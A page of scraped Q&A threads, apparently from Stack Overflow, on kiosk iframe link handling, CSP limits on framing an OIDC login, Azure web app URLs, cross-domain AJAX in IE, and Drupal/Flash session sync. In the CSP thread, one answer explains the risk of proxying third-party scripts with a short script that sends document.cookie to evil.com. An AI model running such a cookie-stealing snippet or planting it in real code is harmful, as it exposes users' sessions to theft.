I've created a virtual desk page that will run in a browser (IE11 or chrome) in kiosk mode, I want to to put the result on a big touchscreen display in order to allow the users to explorer the intranet site through the kiosk.
In the page I have also an iframe which shows other sites in my domain mycompany.com.
I'm trying to build a policy for which sites shown in the iframe are allowed to follow href to other pages but disabling mailto and file link ( in order to avoid the the browser open the e-mail client or the file explorer).
Of course, I cannot change the code of the original sites shown in the iframe and I know that I cannot override the href with a JS in the container page because of the same-origin policy.
Is there a way to obtain this ?
I've found the attribute sandbox of iframe tag in HTML5 but I'm not sure about to use it in order to accomplish the task.
Any ideas ?
Use the desktop app, registry edits or zone policy to control this:
An app can register to become the default handler for a certain Uniform Resource Identifier (URI) scheme name. Both desktop apps and Windows Runtime apps can register to be a default handler for a URI scheme name. If the user chooses your app as the default handler for a URI scheme name, your app will be activated every time that type of URI is launched.
By default, Internet Explorer prevents navigation to Uniform Resource Identifiers (URIs) using the "file:" protocol when the current URL matches the following conditions:
The current URL is opened in the Internet zone or the Restricted Sites zone.
The current URL uses a protocol other than "file:".
For a mail client, the program needs to have registered settings under the HKEY_CLASSES_ROOT\mailto key in order to service URLs that use the mailto protocol. Set values and keys that mirror those settings under the following key.
HKEY_LOCAL_MACHINE
Software
Clients
Mail
CanonicalName
Protocols
mailto
The RegisterProtocolHandler API will work for Chrome:
Chrome 13 finally includes navigator.registerProtocolHandler. This API allows web apps to register themselves as possible handlers for particular protocols. For example, users could select your application to handle “mailto” links.
Register a protocol scheme like:
navigator.registerProtocolHandler(
'mailto', 'about:blank', 'Mail Protocol');
The first parameter is the protocol. The second is the URL pattern of the application that should handle this scheme. The pattern should include a ‘%s’ as a placeholder for data and it must must be on the same origin as the app attempting to register the protocol. Once the user approves access, you can use this link through your app, other sites, etc.
References
Registering Programs with Client Types
Internet Feature Controls (D..H)
Understanding Protocols
How to Handle URI Activation (HTML)
Registering a custom protocol handler | Web Updates - Google Developer
Related
We have a requirement to load an internally hosted angular UI from within an external partners secured website. We're using an OIDC auth flow calling to an internal IDP server to retrieve/validate the user tokens.
The problem is we are not able to make custom modifications to the internal IDP server's rules in order to allow the external partners domain as being valid for calling to from within an iframe (Content Security Policy).
This causes us to get an error related to invalid Content Security Policy as the external partners domain is not within the allowed domains list of the CSP. If we serve this UI in an iframe from within an internal company domain (allowed in the CSP) it works just fine.
Assuming we have to load our internal UI from within the partners website inline (iframe or other), and authenticate our users using an oauth pattern are there any viable solutions for this problem?
I understand the CSP and x-frame-option headers are set this way to avoid click-jacking security risks, so not sure what is being asked of us is possible while remaining secure. Initial thought is to possibly put a proxy service between the partners website and our UI and the proxy service will handle the authentication...bypassing the CSP rules...but does not necessarily seem secure, and not sure how to implement that even if so. Any thoughts or ideas would be welcomed. Thanks!
Proxying third-party scripts is a bad idea. Consider the script:
var Img = document.createElement("img");
Img.setAttribute('src', 'http://evil.com?cookie=' + document.cookie);
document.body.appendChild(Img);
Loaded from someone else's domain, the script will not have access to the document.cookie. But after proxying, the browser counts that the script is loaded from your domain, and will send cookies to the evil.com site.
Allowing your site to be embedded into iframe open doors to:
clickjacking: by placing an invisible frame, it allows you to perform actions on behalf of a visitor if he is logged at third-party site.
Phishing: in the case of an iframe, the user does not see the real URL in the address bar. Therefore, an attacker can load an iframe from his domain that looks like a third-party authorization site. Since visitor is not able to see this, he enter login/password at the attackers site.
third-party scripts access to some sensitive user's data such as: geolocation, camera, microphone, speaker, mobile device sensors (accelerometer, gyroscope, ambient-light-sensor, magnetometer, vibrate) etc. See Feature Policy / Permissions Policy how to restrict these.
For using your IDP server for autentificating user on third-party site, you MUST do redirect to your domain, autentificate user on your domainm and redirect user back to the third-party site. To keep auth a JWT token can be used or third-party site can set its own auth cookie. The referrer is used to return back to the partner's page where auth was started. Google's OAuth2 service works in this way.
It is not known what private/financial data your web application is dealing with, but it is unlikely that you want to be responsible for the actions of third parties by making a hole in the security system for them.
I have been using Windows Azure to host some of our internal utility projects using Web App. When I create a new web app say "MyTestApp", the default URL created in portal will be:
"http://MyTestApp.azurewebsites.net"
Refer Image
However, when I click this URL, it will not open in browser. To fix it, I have to manually append "s" in the protocol to make it
"https://MyTestApp.azurewebsites.net".
I understand that by default, Azure secures the *.azurewebsites.net wildcard domain with a single SSL certificate, so the clients can access the app at
"https://appname.azurewebsites.net"
But I wondering why the portal display the non SSL URL (http). Is there a reason for that?
Update:
I tested it with Firefox too (based on suggestion in comments) and tried both hitting URL as well as Browse button. Since the URL is http, on new tab, it just say "waiting for MyTestApp..." and then "waiting for login.microsoft.com...".
However, when I click this URL, it will not open the WebApp in browser.
If we click the URL and the [Overview] table is fully loaded, then it will work correctly . We also can browse the website via click the [Browse] option.
why the portal display the non-SSL URL (http)?
This may be the topic about advantage and disadvantage of Http VS Https. Generally, one of the primary blockers for HTTPS adoption is the fact that the HTTPS protocol is slow. Here’s a very informative ServerFault thread showing just how big of a slowdown.HTTPS encrypts traffic between us and a server. It is more security than HTTP. And Azure also allow HTTPS access to our WebApp and support to enforce HTTPS on our WebApp.
I am calling a web service using ajax from asp.net application, but unable to retrieve data from the service.
But when i enable the cross domain on IE
Internet options -> Trusted sites -> Custom Level -> Miscellaneous -> Access data sources across domains -> Enable
it works fine.
But how to enable it from the application, as we cannot expect every user to make IE setting changes.
Or, is there any other approach?
I just went through this and there can be a number of variable. Here is a blog that talks about them and provides links on a number of solutions. Web API, JSON, AJAX, CORS, Chrome 500 error and Authentication Basically it is a CORS issue and on top of it, it could be the need to pass authorization headers if your services are protected.
I have a situation where my web application is opened from a CRM (win-based application).
Can I get the name of the application through a request variable? In a web application, the referral url works. Is there something which I can explore?
There's no way your web server is going to know which application opened the browser ... unless ... you give the application a different URL than normal traffic. (Same method advertising campaigns use to tell who has been clicking on their ads.) Have the desktop application use a URL with an added query parameter:
www.mywebsite.com/?source=mydesktopapplication
If this is impossible for you because you can't change the desktop app, then the only other (imperfect) thing I can think of is to assume that people with no referral URL are coming from the application. The problem with this of course is that you will mistakenly identify visitors with no referral URL who still did not come from the desktop app, such as people who typed your website's URL into their address bar, or who clicked on a bookmarked link.
I have a Drupal site with user logins. Embedded within this site is a Flash application that shows some data to everybody but allows extra functionality if the user is logged on. From within Flash, I'm using XMLRPC to access the system.check method (to determine whether the user is logged in) and the user.login method (to log in a user from within Flash).
Within Flash, everything works fine. However the Flash login state does not seem to correspond to the rest of the site. For example, if I invoke user.login via XMLRPC, subsequent calls to system.check show that I am logged in, but the Drupal user page still says I'm logged out. Or if I am logged in both places and then I log out via the Drupal user page, the next call to system.check still indicates that I am logged in.
How can I make the login state consistent between the Drupal GUI and my embedded Flash app?
(Note: I am not using any XMLRPC library, I am just constructing the requisite XML manually and sending POST methods using a URLRequest object.)
EDIT: I have confirmed via this question and also via testing with a Web Proxy that the SESS cookie returned by the user login page is being picked up and sent back by the flash application.
EDIT: And now I have shown experimentally that even though Flash (via Safari) is sending the same cookie, it gets back a DIFFERENT cookie when it connects to the XMLRPC service than when it requests and HTML page. In other words, Drupal just doesn't support this kind of synchronization and I'm stuck. I'm accepting the answer below that put me on the right track.
EDIT: AMHPHP is not fully released for Drupal6 as of this writing, but it turned out to be installed on the site anyway. Using the DrupalSite library, I was very easily able to log into and out of the site from flash, and the login remained consistent between flash and HTML.
I'm not terribly familar with Flash, but do the URLRequest objects "inherit" state from the browser session, including the user login cookies? If not, you'll need to explicitly send the login cookie with your hand-built request or Drupal will think that it's just coming from another web browser at the same IP address.
If you're not quite sure, using the Firebug plugin might be useful. It lets you inspect any requests that are being piped through the browser, examine their headers, and look at the raw HTTP response object that comes back.
Update: Even more important than the flash widget getting a session cookie is the flash widget getting the SAME session cookie as the web browser itself. Drupal allows users to log in from multiple machines simultaneously, so if the browser is creating one session and the flash widget is creating another, you'd see the behavior you're describing...
It can't be done.
(For details, please see my final edit to the original question and the equivalent information in my comment to #Eaton.)